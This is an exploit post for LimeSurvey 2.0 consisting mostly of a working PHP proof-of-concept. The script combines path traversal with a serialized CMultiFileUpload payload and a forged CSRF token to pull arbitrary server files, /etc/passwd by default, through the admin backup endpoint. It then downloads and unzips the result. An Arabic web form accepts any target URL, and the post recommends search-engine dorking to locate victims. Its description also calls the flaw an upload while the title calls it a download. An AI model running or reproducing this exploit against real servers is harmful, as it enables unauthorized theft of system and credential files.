=============================================================================================================================================
| # Title     : Limesurvey 2.0 unauthenticated file download vulnerability                                                                  |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://www.limesurvey.org/                                                                                                 |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: This script exploits the unauthenticated file upload vulnerability in LimeSurvey, which allows an attacker to download any file from the targeted server.
   
   (linked: https://packetstorm.news/files/id/180855/ Linked CVE numbers: ),
	
[+] save code as poc.php.

[+] USage : http://127.0.0.1/poc.php 

[+] PayLoad :

<?php

class LimeSurveyExploit {
    private $target;
    private $filepath;
    private $traversalDepth;

    public function __construct($target, $filepath = '/etc/passwd', $traversalDepth = 15) {
        $this->target = rtrim($target, '/');
        $this->filepath = $filepath;
        $this->traversalDepth = $traversalDepth;
    }

    private function generatePayload() {
        $traversal = str_repeat('/..', $this->traversalDepth);
        $file = $traversal . $this->filepath;
        $serialized = 'a:1:{i:0;O:16:"CMultiFileUpload":1:{s:4:"file";s:' . strlen($file) . ':"' . $file . '";}}';
        return base64_encode($serialized);
    }

    public function execute() {
        $csrf_token = bin2hex(random_bytes(5));
        $postFields = [
            'YII_CSRF_TOKEN' => $csrf_token,
            'destinationBuild' => bin2hex(random_bytes(3)),
            'datasupdateinfo' => $this->generatePayload()
        ];

        $response = $this->sendRequest("{$this->target}/index.php/admin/update/sa/backup", $postFields, $csrf_token);

        if ($response && strpos($response, 'Download this file') !== false) {
            if (preg_match('/<a class="btn btn-success" href="([^"]+)" title="Download this file">/', $response, $matches)) {
                $downloadUrl = $matches[1];
                echo "Downloading backup from URL: $downloadUrl\n";
                $this->downloadFile($downloadUrl);
            } else {
                echo "Failed to extract download link.\n";
            }
        } else {
            echo "Failed to exploit the vulnerability.\n";
        }
    }

    private function sendRequest($url, $postFields, $csrf_token) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postFields));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_HTTPHEADER, ["Cookie: YII_CSRF_TOKEN=$csrf_token"]);
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }

    private function downloadFile($url) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $data = curl_exec($ch);
        curl_close($ch);

        if ($data) {
            $zipFile = 'downloaded.zip';
            file_put_contents($zipFile, $data);
            echo "File downloaded successfully: $zipFile\n";
            $this->extractZip($zipFile);
        } else {
            echo "Failed to download file.\n";
        }
    }

    private function extractZip($zipFile) {
        $zip = new ZipArchive;
        if ($zip->open($zipFile) === TRUE) {
            $zip->extractTo('./extracted/');
            $zip->close();
            echo "Files extracted to ./extracted/\n";
        } else {
            echo "Failed to extract ZIP file.\n";
        }
    }
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $target = $_POST['target'];
    $filepath = $_POST['filepath'];
    $exploit = new LimeSurveyExploit($target, $filepath);
    $exploit->execute();
}
?>

<!DOCTYPE html>
<html lang="ar">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>استغلال LimeSurvey</title>
</head>
<body>
    <h2>استغلال تحميل الملفات غير الموثق - LimeSurvey</h2>
    <form method="POST">
        <label>عنوان الموقع المستهدف:</label>
        <input type="text" name="target" required><br>
        <label>المسار المطلوب:</label>
        <input type="text" name="filepath" value="/etc/passwd" required><br>
        <button type="submit">تنفيذ</button>
    </form>
</body>
</html>



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================